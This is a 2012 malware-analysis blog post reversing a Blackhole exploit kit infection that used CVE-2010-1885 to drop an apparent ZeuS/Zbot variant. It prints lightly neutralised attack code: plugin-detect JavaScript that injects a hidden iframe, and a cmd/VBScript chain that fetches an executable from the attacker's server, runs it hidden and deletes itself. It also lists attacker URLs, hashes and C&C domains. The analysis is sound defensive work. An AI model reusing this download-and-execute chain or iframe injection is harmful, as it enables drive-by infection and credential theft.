Wednesday, September 19, 2012

"Geek" Way in Reversing #CVE-2010-1885 Infection via PluginDetect Script/Blackhole EK (85.17.165.22)

Just finished handling local infection case today, behind this case is the beloved blackhole exploit kit. Some WinXP for some 3rd party software compatibility trouble can't install Microsoft's critical patch (MS10-042) properly, this patch is about the infamous (CVE-2010-1885) which is critical vulnerability in MPC::HexToNum function in helpctr.exe (a.k.a. hcp://URL flaw). And these clients accidentally opening a spam mail contains the BHEK infected url (some of you like to say it as "BHEK landing page"), downloading a payload which the installed antivirus software cannot even detect it yet.

That was just happened today and was really made my day. Since the flaw was fixed by microsoft in about 2years ago I never expect to see un-patched systems which still having this flaw, yet it does exist, bunch of it. Surprisingly, since there are some possibility of XP users are also having similar risk so I dare myself to write the reversing of this infection for your information on handling similar case.

The infectors was BHEK of in 85.17.165.22 , looks being up less than 24h 
with reports below here--->>[URL-QUERY-LINK]
The landing page is:  h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the below infection components:
/Gam.jar           EXPL: Java/2012-1723 (go to below explanation)
/data/field.swf    EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload
/data/ap1.php      EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php      EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1 EXPL: EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload
/w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HRC vulns SAV: %TEMP%\file.exe
↑see the last line closely, this is the case that I will describe here. If you deobfs the landing page well, you'll see BHEK plugin detect, just in case, you can see my neutralized deobfs code here: --->>[PASTEBIN] in the line 1790 you will see code like this
Function spl4(){
  try {
    For (var i = O, m; i < navigator・plugins・length; i ++ ){
      var name = navigator・plugins「i」.name;
      iF (name.indexOF('Media Player') !=- 1){
        m = document・createElement('IFRAM3');
        m.setAttribute('src', './data/hhcp.php?c=F4dFb');
        m.setAttribute('width', O);
        m.setAttribute('height', O);
        document・body「'appendChild'」(m)
      }
Which will lead you to the downloaded html file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
And this file will contain the other obfs code like this: eval can be decoded as per below pic, an iframe contains exploit and - also an execution arbitary command: The format of the malicious iframe is as per below:
<iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
//legends:
xxxxx=CVE-2010-1885 PoC strings
yyyyy=executable aribary command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see similarity: ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205 Following, the "yyyyy" is combination of cmd and Windows (Visual Basic) Script commands:
cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\
 go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\
 go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\
 go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\
 go・vbs&&echo objHTTP・Send>>%TEMP%\
 go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\
 go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\
 go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\
 go・vbs&&echo oStream・open >>%TEMP%\
 go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\
 go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\
 go・vbs&&echo oStream・close>>%TEMP%\
 go・vbs&&echo set oStream = nothing >>%TEMP%\
 go・vbs&&echo Set xml = Nothing >>%TEMP%\
 go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\
 go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\
 go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\
 go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\
 go・vbs|cscript %TEMP%\
 go・vbs>nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means:
Download file from 85.17.165.22/w・php?f=f4dfb&e=5 & save it in %TEMP%\file.exe, via MSXML2・XMLHTTP stream, and then runs it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from infected PC and I had to - extract it out of the memory manually)
The worse part is almost everyone miss this tiny obfuscated file- even in the Virus Total ONLY 3(three) products can detect it:
MD5: 5629b24e0faae7b42127df9f592fed48 File size: 5.2 KB ( 5326 bytes ) File name: hhcp.php@c=f4dfb File type: HTML Tags: html cve-2010-1885 exploit Detection: 3 / 43 Analysisdate:2012-09-19 19:36:44 UTC ( 1 時間, 7 分 ago ) URL: ------>>[VIRUS-TOTAL]
Furthermore the payload looks like this "Fake" Intel Logo: Which runs these both processes:
PID MEM        PATH                Event    
216 2007536674 %path%unknown.exe   Global\crypt32LogoffEvent //Stays as process
840 2088831062 %System%svchost.exe //Kicking off svchost
I don't have enough time to do deep analysis of this binary, so a quicky then.. Binary snapshot:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9    .....j...j...j..
0090   EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9    .I...j...j...j..
00A0   73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9    sJ...j...I...j..
00B0   82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9    .u...j..Rich.j..
00C0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00    ........PE..L...
00D0   A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01    .xWP............
Section:
   .text  0x44000(snipped)
   .rdata 0x45000 0x2d84 11776
   .data  0x48000 0xd38 3584
   .adata 0x49000 0x10 512
   .CRT   0x4b000 0x10 512 <--- cryptor pack
   .rsrc  0x4c000 0x1a18 7168 
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
Shortly, some suspicious calls detected while it stays in process.. Below is my adventure in reversing graph, the way it steals so many info - I guess is a variant of ZeuS Trojan or ZeuS/Zbot↓ In the mean time Virus Total can detect this as per below:
MD5: c559573fc5ab9862607e4fa4b2edfc04 File size: 294.0 KB ( 301056 bytes ) File name: unknown.exe File type: Win32 EXE Detection: 19 / 43 Analysis date: 2012-09-19 17:58:31 UTC ( 1 分 ago ) URL:---->>[VIRUS-TOTAL]
The current malware names are:
F-Secure                 : Trojan.Generic.KD.731435
Microsoft                : PWS:Win32/Zbot
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan.Gen
TrendMicro               : TROJ_GEN.R42CDII
McAfee-GW-Edition        : PWS-Zbot.vo!a
Fortinet                 : W32/Androm.DW!tr
TrendMicro-HouseCall     : TROJ_GEN.R42CDII
Avast                    : Win32:Trojan-gen
Ikarus                   : Trojan-Spy.Win32.Zbot
GData                    : Trojan.Generic.KD.731435
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.Generic.KD.731435
McAfee                   : PWS-Zbot.gen.ana
Panda                    : Trj/Genetic.gen
AhnLab-V3                : Spyware/Win32.Zbot
AntiVir                  : TR/Injector.air.1
Sophos                   : Mal/EncPk-AGK
Comodo                   : UnclassifiedMalware
The moral of the story is, do not under estimate "every" exploit implemented in the exploit kit. Those exploits are picked up well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. when it hits, you may get yourself an epidemic.

And, to malware analyser/researcher(etc), to understand how infection works by reversing the malicious+exploit code by yourself will change the way you think about handling malware in the future, trust me. You may continue to whatever automation system/tool you use, but at least, for one time, try to figure it out by your ownself! I won't sell you no crap.

#MalwareMustDie!

2 comments:

  1. Based on following the domain names used in the malware (salesalesalesale.ru and hluyujgygj.ru) we can see that the first C&C was associated with Citadel (https://zeustracker.abuse.ch/monitor.php?host=salesalesalesale.ru - now NXDOMAIN) and the second is not as well known; I have submitted it to be taken down. #MalwareMustDie

    ReplyDelete
  2. Thanks for your kindly response & great follow! We published good obfuscation tool method in deobfuscation of pseudorandom in the newest post, be free to check!

    ReplyDelete